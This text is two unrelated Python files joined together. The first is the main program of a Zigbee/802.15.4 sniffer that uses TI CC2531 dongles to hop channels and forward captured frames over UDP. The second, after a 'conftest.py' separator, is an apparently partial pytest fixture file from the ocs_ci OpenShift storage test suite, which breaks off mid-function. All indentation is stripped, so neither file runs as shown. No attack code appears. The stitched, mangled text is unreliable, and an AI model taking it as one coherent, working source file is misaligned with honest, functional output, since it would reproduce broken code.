# TI CC2531 dongle --(libusb1/python_libusb1)--> CC2531() --> receiver() -- (socket) --> interpreter()
#
# CC2531.py is the USB driver for the dongle
# receiver.py is the handler to receive 802.15.4 frame and forward them over the socket
# interpreter.py is the socket server and prints interpreted information
#
###
import os
import socket
import signal
import argparse
from time import time, sleep
from binascii import hexlify, unhexlify
from threading import Thread, Event
from CC2531 import *
from receiver import *
from interpreter import *
from gps import *
def LOG(msg=''):
print('[sniffer] %s' % msg)
###
# Dummy servers for testing purpose
###
def create_file_serv(addr):
# Make sure the socket does not already exist
try:
os.unlink(addr)
except OSError:
if os.path.exists(addr):
raise(Exception('cannot clean %s' % addr))
# serv on file
sk = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
try:
sk.bind(addr)
except socket.error:
raise(Exception('cannot clean %s' % addr))
return sk
def create_udp_serv(addr):
# serv on UDP port
sk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
sk.bind(addr)
except socket.error:
raise(Exception('cannot bind on UDP port %s' % list(addr)))
return sk
def test_receiver(x=0):
cc = CC2531(get_CC2531()[x])
receiver.DEBUG = 1
receiver.SOCK_ADDR = ('localhost', 2154)
receiver.CHAN_LIST = [0x0f, 0x14, 0x19]
receiver.CHAN_PERIOD = 10
serv = create_udp_serv(receiver.SOCK_ADDR)
s = receiver(cc)
s.listen()
###
# Multi-receiver for multi-threaded execution
###
def threadit(task, *args, **kwargs):
th = Thread(target=task, args=args, kwargs=kwargs)
th.daemon = True
th.start()
return th
def prepare_receiver(chans=[0x0f, 0x14, 0x19]):
ccs = map(CC2531, get_CC2531())
#
if len(ccs) == 0:
LOG(' no CC2531 dongles found')
return []
#
# split the chans' list into separate lists for all receivers
e, r = len(chans)//len(ccs), len(chans)%len(ccs)
cl = []
start, stop = 0, 0
for i in range(len(ccs)):
if stop > 0:
start = stop
if i < r:
stop = start + e + 1
else:
stop = start + e
cl.append(chans[start:stop])
#
ss = [receiver(cc) for cc in ccs]
for i in range(len(cl)):
# configure channels' list of each CC2531 receiver
ss[i].CHAN_LIST = cl[i]
#
return ss
###
# Main program
###
def prolog():
# command line handler
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
description='Use TI CC2531 dongles to sniff on IEEE 802.15.4 channels.\n'\
'Forward all sniffed frames over the network (UDP/2154 port).\n'\
'Each frame is packed with a list of TLV fields:\n'\
'\tTag : uint8, Length : uint8, Value : char*[L]\n'\
'\tT=0x01, 802.15.4 channel, uint8\n'
'\tT=0x02, epoch time at frame reception, ascii encoded\n'
'\tT=0x03, position at frame reception (if positionning server available)\n'
'\tT=0x10, 802.15.4 frame within TI PSD structure\n'
'\tT=0x20, 802.15.4 frame\n'\
'Output 802.15.4 frame information (channel, RSSI, MAC header, ...)')
#
parser.add_argument('-d', '--debug', type=int, default=0,
help='debug level (0: silent, 3: very verbose)')
parser.add_argument('-c', '--chans', nargs='*', type=int, default=range(11,27),
help='list of IEEE 802.15.4 channels to sniff on (between 11 and 26)')
parser.add_argument('-p', '--period', type=float, default=1.0,
help='time (in seconds) to sniff on a single channel before hopping')
parser.add_argument('-n', '--nofcschk', action='store_true', default=False,
help='displays all sniffed frames, even those with failed FCS check')
parser.add_argument('--gps', type=str, default='/dev/ttyUSB0',
help='serial port to get NMEA information from GPS')
parser.add_argument('--ip', type=str, default='localhost',
help='network destination for forwarding 802.15.4 frames')
parser.add_argument('--filesock', action='store_true', default=False,
help='forward 802.15.4 frames to a UNIX file socket /tmp/cc2531_server '\
'instead of the UDP socket')
parser.add_argument('-f', '--file', action='store_true', default=False,
help='output (append) frame information to file /tmp/cc2531_sniffer')
parser.add_argument('-s', '--silent', action='store_true', default=False,
help='do not print frame information on stdout')
#
args = parser.parse_args()
#
if args.debug:
LOG(' command line arguments:\n%s' % repr(args))
CC2531.DEBUG = max(0, args.debug-2)
GPS_reader.DEBUG = max(0, args.debug-2)
receiver.DEBUG = max(0, args.debug-1)
interpreter.DEBUG = args.debug
#
receiver.CHAN_PERIOD = args.period
if args.filesock:
receiver.SOCK_ADDR = '/tmp/cc2531_server'
else:
receiver.SOCK_ADDR = (args.ip, 2154)
if os.path.exists(args.gps):
GPS_reader.PORT = args.gps
#
chans = [c for c in args.chans if 11 <= c <= 26]
if chans == []:
chans = CHANNELS.keys()
#
interpreter.SOCK_ADDR = receiver.SOCK_ADDR
if args.file:
interpreter.OUTPUT_FILE = '/tmp/cc2531_sniffer'
else:
interpreter.OUTPUT_FILE = None
interpreter.OUTPUT_STDOUT = not args.silent
#
interpreter.FCS_IGNORE = args.nofcschk
#
return chans
def main():
#
global running
running = False
#
chans = prolog()
#
# init threads' list and CTRL+C handler
# threaded parts are not getting signals:
# -> all threads are daemonized
# -> the stop_event Event() signals each thread to stop listening over USB
threads = []
stop_event = Event()
interpreter._THREADED = True
interpreter._STOP_EVENT = stop_event
GPS_reader._THREADED = True
GPS_reader._STOP_EVENT = stop_event
receiver._THREADED = True
receiver._STOP_EVENT = stop_event
#
def int_handler(signum, frame):
print('SIGINT: quitting')
stop_event.set()
#for c, t in threads:
# print('stopping thread: %s' % repr(t))
global running
running = False
signal.signal(signal.SIGINT, int_handler)
#
running = True
# start interpreter (/server)
interp = interpreter()
threads.append( (interp, threadit(interp.process)) )
#
# start gps reader
gps = GPS_reader()
receiver.GPS = gps
threads.append( (gps, threadit(gps.listen)) )
#
# start CC2531 receivers
ccs = prepare_receiver(chans)
for cc in ccs:
threads.append( (cc, threadit(cc.listen)) )
#
# loop infinitely until SIGINT is caught
# this loop lets all daemonized threads running
while running:
sleep(1)
#
# finally, wait for each thread to stop properly after they received
# the stop_event signal
for c, t in threads:
t.join()
if __name__ == '__main__':
main()
|
conftest.py
|
import logging
import os
import random
import time
import tempfile
import threading
from concurrent.futures.thread import ThreadPoolExecutor
from datetime import datetime
from math import floor
from shutil import copyfile
from functools import partial
from botocore.exceptions import ClientError
import pytest
from collections import namedtuple
from ocs_ci.deployment import factory as dep_factory
from ocs_ci.framework import config
from ocs_ci.framework.pytest_customization.marks import (
deployment,
ignore_leftovers,
tier_marks,
ignore_leftover_label,
)
from ocs_ci.ocs import constants, defaults, fio_artefacts, node, ocp, platform_nodes
from ocs_ci.ocs.bucket_utils import craft_s3_command
from ocs_ci.ocs.exceptions import (
CommandFailed,
TimeoutExpiredError,
CephHealthException,
ResourceWrongStatusException,
UnsupportedPlatformError,
PoolDidNotReachReadyState,
StorageclassNotCreated,
PoolNotDeletedFromUI,
StorageClassNotDeletedFromUI,
)
from ocs_ci.ocs.mcg_workload import mcg_job_factory as mcg_job_factory_implementation
from ocs_ci.ocs.node import get_node_objs, schedule_nodes
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pvc
from ocs_ci.ocs.utils import setup_ceph_toolbox, collect_ocs_logs
from ocs_ci.ocs.resources.backingstore import (
backingstore_factory as backingstore_factory_implementation,
)
from ocs_ci.ocs.resources.namespacestore import (
namespace_store_factory as namespacestore_factory_implementation,
)
from ocs_ci.ocs.resources.bucketclass import (
bucket_class_factory as bucketclass_factory_implementation,
)
from ocs_ci.ocs.resources.cloud_manager import CloudManager
from ocs_ci.ocs.resources.cloud_uls import (
cloud_uls_factory as cloud_uls_factory_implementation,
)
from ocs_ci.ocs.node import check_nodes_specs
from ocs_ci.ocs.resources.mcg import MCG
from ocs_ci.ocs.resources.objectbucket import BUCKET_MAP
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.resources.pod import (
get_rgw_pods,
delete_deploymentconfig_pods,
get_pods_having_label,
get_deployments_having_label,
Pod,
)
from ocs_ci.ocs.resources.pvc import PVC, create_restore_pvc
from ocs_ci.ocs.version import get_ocs_version, report_ocs_version
from ocs_ci.ocs.cluster_load import ClusterLoad, wrap_msg
from ocs_ci.utility import (
aws,
deployment_openshift_logging as ocp_logging_obj,
ibmcloud,
kms as KMS,
reporting,
templating,
users,
)
from ocs_ci.utility.environment_check import (
get_status_before_execution,
get_status_after_execution,
)
from ocs_ci.utility.flexy import load_cluster_info
from ocs_ci.utility.kms import is_kms_enabled
from ocs_ci.utility.prometheus import PrometheusAPI
from ocs_ci.utility.uninstall_openshift_logging import uninstall_cluster_logging
from ocs_ci.utility.utils import (
ceph_health_check,
ceph_health_check_base,
get_running_ocp_version,
get_openshift_client,
get_system_architecture,
get_testrun_name,
load_auth_config,
ocsci_log_path,
skipif_ocp_version,
skipif_ocs_version,
TimeoutSampler,
skipif_upgraded_from,
update_container_with_mirrored_image,
skipif_ui_not_support,
)
from ocs_ci.helpers import helpers
from ocs_ci.helpers.helpers import (
create_unique_resource_name,
create_ocs_object_from_kind_and_name,
setup_pod_directories,
get_current_test_name,
)
from ocs_ci.ocs.bucket_utils import get_rgw_restart_counts
from ocs_ci.ocs.pgsql import Postgresql
from ocs_ci.ocs.resources.rgw import RGW
from ocs_ci.ocs.jenkins import Jenkins
from ocs_ci.ocs.couchbase import CouchBase
from ocs_ci.ocs.amq import AMQ
from ocs_ci.ocs.elasticsearch import ElasticSearch
from ocs_ci.ocs.ui.base_ui import login_ui, close_browser
from ocs_ci.ocs.ripsaw import RipSaw
from ocs_ci.ocs.ui.block_pool import BlockPoolUI
from ocs_ci.ocs.ui.storageclass import StorageClassUI
log = logging.getLogger(__name__)
class OCSLogFormatter(logging.Formatter):
def __init__(self):
fmt = (
"%(asctime)s - %(threadName)s - %(levelname)s - %(name)s.%(funcName)s.%(lineno)d "
"- %(message)s"
)
super(OCSLogFormatter, self).__init__(fmt)
def pytest_logger_config(logger_config):
logger_config.add_loggers([""], stdout_level="info")
logger_config.set_log_option_default("")
logger_config.split_by_outcome()
logger_config.set_formatter_class(OCSLogFormatter)
def pytest_collection_modifyitems(session, items):
"""
A pytest hook to filter out skipped tests satisfying
skipif_ocs_version, skipif_upgraded_from or skipif_no_kms
Args:
session: pytest session
config: pytest config object
items: list of collected tests
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
# Add squad markers to each test item based on filepath
for item in items:
for squad, paths in constants.SQUADS.items():
for _path in paths:
# Limit the test_path to the tests directory
test_path = os.path.relpath(item.fspath.strpath, constants.TOP_DIR)
if _path in test_path:
item.add_marker(f"{squad.lower()}_squad")
item.user_properties.append(("squad", squad))
break
if not (teardown or deploy or skip_ocs_deployment):
for item in items[:]:
skipif_ocp_version_marker = item.get_closest_marker("skipif_ocp_version")
skipif_ocs_version_marker = item.get_closest_marker("skipif_ocs_version")
skipif_upgraded_from_marker = item.get_closest_marker(
"skipif_upgraded_from"
)
skipif_no_kms_marker = item.get_closest_marker("skipif_no_kms")
skipif_ui_not_support_marker = item.get_closest_marker(
"skipif_ui_not_support"
)
if skipif_ocp_version_marker:
skip_condition = skipif_ocp_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocp_version(skip_condition[0]):
log.info(
f"Test: {item} will be skipped due to OCP {skip_condition}"
)
items.remove(item)
continue
if skipif_ocs_version_marker:
skip_condition = skipif_ocs_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocs_version(skip_condition[0]):
log.info(f"Test: {item} will be skipped due to {skip_condition}")
items.remove(item)
continue
if skipif_upgraded_from_marker:
skip_args = skipif_upgraded_from_marker.args
if skipif_upgraded_from(skip_args[0]):
log.info(
f"Test: {item} will be skipped because the OCS cluster is"
f" upgraded from one of these versions: {skip_args[0]}"
)
items.remove(item)
if skipif_no_kms_marker:
try:
if not is_kms_enabled():
log.info(
f"Test: {item} it will be skipped because the OCS cluster"
f" has not configured cluster-wide encryption with KMS"
)
items.remove(item)
except KeyError:
log.warning(
"Cluster is not yet installed. Skipping skipif_no_kms check."
)
if skipif_ui_not_support_marker:
skip_condition = skipif_ui_not_support_marker
if skipif_ui_not_support(skip_condition.args[0]):
log.info(
f"Test: {item} will be skipped due to UI test {skip_condition.args} is not available"
)
items.remove(item)
continue
# skip UI test on openshift dedicated ODF-MS platform
if (
config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM
or config.ENV_DATA["platform"].lower() == constants.ROSA_PLATFORM
):
for item in items.copy():
if "/ui/" in str(item.fspath):
log.info(
f"Test {item} is removed from the collected items"
f" UI is not supported on {config.ENV_DATA['platform'].lower()}"
)
items.remove(item)
@pytest.fixture()
def supported_configuration():
"""
Check that cluster nodes have enough CPU and Memory as described in:
https://access.redhat.com/documentation/en-us/red_hat_openshift_container_storage/4.2/html-single/planning_your_deployment/index#infrastructure-requirements_rhocs
This fixture is intended as a prerequisite for tests or fixtures that
run flaky on configurations that don't meet minimal requirements.
Minimum requirements for each starting node (OSD+MON):
16 CPUs
64 GB memory
Last documentation check: 2020-02-21
"""
min_cpu = constants.MIN_NODE_CPU
min_memory = constants.MIN_NODE_MEMORY
log.info("Checking if system meets minimal requirements")
if not check_nodes_specs(min_memory=min_memory, min_cpu=min_cpu):
err_msg = (
f"At least one of the worker nodes doesn't meet the "
f"required minimum specs of {min_cpu} vCPUs and {min_memory} RAM"
)
pytest.xfail(err_msg)
@pytest.fixture(scope="session", autouse=True)
def auto_load_auth_config():
try:
auth_config = {"AUTH": load_auth_config()}
config.update(auth_config)
except FileNotFoundError:
pass # If auth file doesn't exist we just ignore.
@pytest.fixture(scope="class")
def secret_factory_class(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="session")
def secret_factory_session(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="function")
def secret_factory(request):
return secret_factory_fixture(request)
def secret_factory_fixture(request):
"""
Secret factory. Calling this fixture creates a new secret.
RBD based is default.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(interface=constants.CEPHBLOCKPOOL):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
"""
secret_obj = helpers.create_secret(interface_type=interface)
assert secret_obj, "Failed to create a secret"
instances.append(secret_obj)
return secret_obj
def finalizer():
"""
Delete the RBD secrets
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def log_ocs_version(cluster):
"""
Fixture handling version reporting for OCS.
This fixture handles alignment of the version reporting, so that we:
* report version for each test run (no matter if just deployment, just
test or both deployment and tests are executed)
* prevent conflict of version reporting with deployment/teardown (eg. we
should not run the version logging before actual deployment, or after
a teardown)
Version is reported in:
* log entries of INFO log level during test setup phase
* ocs_version file in cluster path directory (for copy pasting into bug
reports)
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
dev_mode = config.RUN["cli_params"].get("dev_mode")
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
if teardown and not deploy:
log.info("Skipping version reporting for teardown.")
return
elif dev_mode:
log.info("Skipping version reporting for development mode.")
return
elif skip_ocs_deployment:
log.info("Skipping version reporting since OCS deployment is skipped.")
return
cluster_version, image_dict = get_ocs_version()
file_name = os.path.join(
config.ENV_DATA["cluster_path"], "ocs_version." + datetime.now().isoformat()
)
with open(file_name, "w") as file_obj:
report_ocs_version(cluster_version, image_dict, file_obj)
log.info("human readable ocs version info written into %s", file_name)
@pytest.fixture(scope="class")
def ceph_pool_factory_class(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="session")
def ceph_pool_factory_session(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="function")
def ceph_pool_factory(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
def ceph_pool_factory_fixture(request, replica=3, compression=None):
"""
Create a Ceph pool factory.
Calling this fixture creates new Ceph pool instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL, replica=replica, compression=compression
):
if interface == constants.CEPHBLOCKPOOL:
ceph_pool_obj = helpers.create_ceph_block_pool(
replica=replica, compression=compression
)
elif interface == constants.CEPHFILESYSTEM:
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
).get(defaults.CEPHFILESYSTEM_NAME)
ceph_pool_obj = OCS(**cfs)
assert ceph_pool_obj, f"Failed to create {interface} pool"
if interface != constants.CEPHFILESYSTEM:
instances.append(ceph_pool_obj)
return ceph_pool_obj
def finalizer():
"""
Delete the Ceph block pool
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def storageclass_factory_class(request, ceph_pool_factory_class, secret_factory_class):
return storageclass_factory_fixture(
request, ceph_pool_factory_class, secret_factory_class
)
@pytest.fixture(scope="session")
def storageclass_factory_session(
request, ceph_pool_factory_session, secret_factory_session
):
return storageclass_factory_fixture(
request, ceph_pool_factory_session, secret_factory_session
)
@pytest.fixture(scope="function")
def storageclass_factory(request, ceph_pool_factory, secret_factory):
return storageclass_factory_fixture(request, ceph_pool_factory, secret_factory)
def storageclass_factory_fixture(
request,
ceph_pool_factory,
secret_factory,
):
"""
Create a storage class factory. Default is RBD based.
Calling this fixture creates new storage class instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
secret=None,
custom_data=None,
sc_name=None,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
replica=3,
compression=None,
new_rbd_pool=False,
pool_name=None,
rbd_thick_provision=False,
encrypted=False,
encryption_kms_id=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
secret (object): An OCS instance for the secret.
custom_data (dict): If provided then storageclass object is created
by using these data. Parameters `block_pool` and `secret`
are not useds but references are set if provided.
sc_name (str): Name of the storage class
replica (int): Replica size for a pool
compression (str): Compression type option for a pool
new_rbd_pool (bool): True if user wants to create new rbd pool for SC
pool_name (str): Existing pool name to create the storageclass other
then the default rbd pool.
rbd_thick_provision (bool): True to enable RBD thick provisioning.
Applicable if interface is CephBlockPool
encrypted (bool): True to enable RBD PV encryption
encryption_kms_id (str): Key value of vault config to be used from
csi-kms-connection-details configmap
Returns:
object: helpers.create_storage_class instance with links to
block_pool and secret.
"""
if custom_data:
sc_obj = helpers.create_resource(**custom_data)
else:
secret = secret or secret_factory(interface=interface)
if interface == constants.CEPHBLOCKPOOL:
if config.ENV_DATA.get("new_rbd_pool") or new_rbd_pool:
pool_obj = ceph_pool_factory(
interface=interface,
replica=config.ENV_DATA.get("replica") or replica,
compression=config.ENV_DATA.get("compression") or compression,
)
interface_name = pool_obj.name
else:
if pool_name is None:
interface_name = helpers.default_ceph_block_pool()
else:
interface_name = pool_name
elif interface == constants.CEPHFILESYSTEM:
interface_name = helpers.get_cephfs_data_pool_name()
sc_obj = helpers.create_storage_class(
interface_type=interface,
interface_name=interface_name,
secret_name=secret.name,
sc_name=sc_name,
reclaim_policy=reclaim_policy,
rbd_thick_provision=rbd_thick_provision,
encrypted=encrypted,
encryption_kms_id=encryption_kms_id,
)
assert sc_obj, f"Failed to create {interface} storage class"
sc_obj.secret = secret
instances.append(sc_obj)
return sc_obj
def finalizer():
"""
Delete the storageclass
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def project_factory_class(request):
return project_factory_fixture(request)
@pytest.fixture(scope="session")
def project_factory_session(request):
return project_factory_fixture(request)
@pytest.fixture()
def project_factory(request):
return project_factory_fixture(request)
@pytest.fixture()
def project(project_factory):
"""
This fixture creates a single project instance.
"""
project_obj = project_factory()
return project_obj
def project_factory_fixture(request):
"""
Create a new project factory.
Calling this fixture creates new project.
"""
instances = []
def factory(project_name=None):
"""
Args:
project_name (str): The name for the new project
Returns:
object: ocs_ci.ocs.resources.ocs instance of 'Project' kind.
"""
proj_obj = helpers.create_project(project_name=project_name)
instances.append(proj_obj)
return proj_obj
def finalizer():
delete_projects(instances)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def teardown_project_factory(request):
return teardown_project_factory_fixture(request)
def teardown_project_factory_fixture(request):
"""
Tearing down a project that was created during the test
To use this factory, you'll need to pass 'teardown_project_factory' to your test
function and call it in your test when a new project was created and you
want it to be removed in teardown phase:
def test_example(self, teardown_project_factory):
project_obj = create_project(project_name="xyz")
teardown_project_factory(project_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCP object or list of OCP objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
delete_projects(instances)
request.addfinalizer(finalizer)
return factory
def delete_projects(instances):
"""
Delete the project
instances (list): list of OCP objects (kind is Project)
"""
for instance in instances:
try:
ocp_event = ocp.OCP(kind="Event", namespace=instance.namespace)
events = ocp_event.get()
event_count = len(events["items"])
warn_event_count = 0
for event in events["items"]:
if event["type"] == "Warning":
warn_event_count += 1
log.info(
(
"There were %d events in %s namespace before it's"
" removal (out of which %d were of type Warning)."
" For a full dump of this event list, see DEBUG logs."
),
event_count,
instance.namespace,
warn_event_count,
)
except Exception:
# we don't want any problem to disrupt the teardown itself
log.exception("Failed to get events for project %s", instance.namespace)
ocp.switch_to_default_rook_cluster_project()
instance.delete(resource_name=instance.namespace)
instance.wait_for_delete(instance.namespace, timeout=300)
@pytest.fixture(scope="class")
def pvc_factory_class(request, project_factory_class):
return pvc_factory_fixture(request, project_factory_class)
@pytest.fixture(scope="session")
def pvc_factory_session(request, project_factory_session):
return pvc_factory_fixture(request, project_factory_session)
@pytest.fixture(scope="function")
def pvc_factory(request, project_factory):
return pvc_factory_fixture(
request,
project_factory,
)
def pvc_factory_fixture(request, project_factory):
"""
Create a persistent Volume Claim factory. Calling this fixture creates new
PVC. For custom PVC provide 'storageclass' parameter.
"""
instances = []
active_project = None
active_rbd_storageclass = None
active_cephfs_storageclass = None
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_mode=constants.ACCESS_MODE_RWO,
custom_data=None,
status=constants.STATUS_BOUND,
volume_mode=None,
size_unit="Gi",
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_mode (str): ReadWriteOnce, ReadOnlyMany or ReadWriteMany.
This decides the access mode to be used for the PVC.
ReadWriteOnce is default.
custom_data (dict): If provided then PVC object is created
by using these data. Parameters `project` and `storageclass`
are not used but reference is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
volume_mode (str): Volume mode for PVC.
eg: volume_mode='Block' to create rbd `block` type volume
size_unit (str): PVC size unit, eg: "Mi"
Returns:
object: helpers.create_pvc instance.
"""
if custom_data:
pvc_obj = PVC(**custom_data)
pvc_obj.create(do_reload=False)
else:
nonlocal active_project
nonlocal active_rbd_storageclass
nonlocal active_cephfs_storageclass
project = project or active_project or project_factory()
active_project = project
if interface == constants.CEPHBLOCKPOOL:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_rbd_storageclass = storageclass
elif interface == constants.CEPHFILESYSTEM:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_cephfs_storageclass = storageclass
pvc_size = f"{size}{size_unit}" if size else None
pvc_obj = helpers.create_pvc(
sc_name=storageclass.name,
namespace=project.namespace,
size=pvc_size,
do_reload=False,
access_mode=access_mode,
volume_mode=volume_mode,
)
assert pvc_obj, "Failed to create PVC"
if status:
helpers.wait_for_resource_state(pvc_obj, status)
pvc_obj.storageclass = storageclass
pvc_obj.project = project
pvc_obj.access_mode = access_mode
instances.append(pvc_obj)
return pvc_obj
def finalizer():
"""
Delete the PVC
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
# If they have ReclaimPolicy set to Retain then delete them manually
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
helpers.wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(pv_obj.name)
else:
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=180)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def pod_factory_class(request, pvc_factory_class):
return pod_factory_fixture(request, pvc_factory_class)
@pytest.fixture(scope="session")
def pod_factory_session(request, pvc_factory_session):
return pod_factory_fixture(request, pvc_factory_session)
@pytest.fixture(scope="function")
def pod_factory(request, pvc_factory):
return pod_factory_fixture(request, pvc_factory)
def pod_factory_fixture(request, pvc_factory):
"""
Create a Pod factory. Calling this fixture creates new Pod.
For custom Pods provide 'pvc' parameter.
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
custom_data=None,
status=constants.STATUS_RUNNING,
node_name=None,
pod_dict_path=None,
raw_block_pv=False,
deployment_config=False,
service_account=None,
replica_count=1,
command=None,
command_args=None,
subpath=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod.
raw_block_pv (bool): True for creating raw block pv based pod,
False otherwise.
deployment_config (bool): True for DeploymentConfig creation,
False otherwise
service_account (OCS): Service account object, in case DeploymentConfig
is to be created
replica_count (int): The replica count for deployment config
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
subpath (str): Value of subPath parameter in pod yaml
Returns:
object: helpers.create_pod instance
"""
sa_name = service_account.name if service_account else None
if custom_data:
pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface)
pod_obj = helpers.create_pod(
pvc_name=pvc.name,
namespace=pvc.namespace,
interface_type=interface,
node_name=node_name,
pod_dict_path=pod_dict_path,
raw_block_pv=raw_block_pv,
dc_deployment=deployment_config,
sa_name=sa_name,
replica_count=replica_count,
command=command,
command_args=command_args,
subpath=subpath,
)
assert pod_obj, "Failed to create pod"
if deployment_config:
dc_name = pod_obj.get_labels().get("name")
dc_ocp_dict = ocp.OCP(
kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace
).get(resource_name=dc_name)
dc_obj = OCS(**dc_ocp_dict)
instances.append(dc_obj)
else:
instances.append(pod_obj)
if status:
helpers.wait_for_resource_state(pod_obj, status, timeout=300)
pod_obj.reload()
pod_obj.pvc = pvc
if deployment_config:
return dc_obj
return pod_obj
def finalizer():
"""
Delete the Pod or the DeploymentConfig
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def teardown_factory_class(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="session")
def teardown_factory_session(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="function")
def teardown_factory(request):
return teardown_factory_fixture(request)
def teardown_factory_fixture(request):
"""
Tearing down a resource that was created during the test
To use this factory, you'll need to pass 'teardown_factory' to your test
function and call it in your test when a new resource was created and you
want it to be removed in teardown phase:
def test_example(self, teardown_factory):
pvc_obj = create_pvc()
teardown_factory(pvc_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCS object or list of OCS objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
"""
Delete the resources created in the test
"""
for instance in instances[::-1]:
if not instance.is_deleted:
reclaim_policy = (
instance.reclaim_policy if instance.kind == constants.PVC else None
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
if reclaim_policy == constants.RECLAIM_POLICY_DELETE:
helpers.validate_pv_delete(instance.backed_pv)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def service_account_factory_class(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="session")
def service_account_factory_session(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="function")
def service_account_factory(request):
return service_account_factory_fixture(request)
def service_account_factory_fixture(request):
"""
Create a service account
"""
instances = []
active_service_account_obj = None
def factory(project=None, service_account=None):
"""
Args:
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
service_account (str): service_account_name
Returns:
object: serviceaccount instance.
"""
nonlocal active_service_account_obj
if active_service_account_obj and not service_account:
return active_service_account_obj
elif service_account:
sa_obj = helpers.get_serviceaccount_obj(
sa_name=service_account, namespace=project.namespace
)
if not helpers.validate_scc_policy(
sa_name=service_account, namespace=project.namespace
):
helpers.add_scc_policy(
sa_name=service_account, namespace=project.namespace
)
sa_obj.project = project
active_service_account_obj = sa_obj
instances.append(sa_obj)
return sa_obj
else:
sa_obj = helpers.create_serviceaccount(
namespace=project.namespace,
)
sa_obj.project = project
active_service_account_obj = sa_obj
helpers.add_scc_policy(sa_name=sa_obj.name, namespace=project.namespace)
assert sa_obj, "Failed to create serviceaccount"
instances.append(sa_obj)
return sa_obj
def finalizer():
"""
Delete the service account
"""
for instance in instances:
helpers.remove_scc_policy(
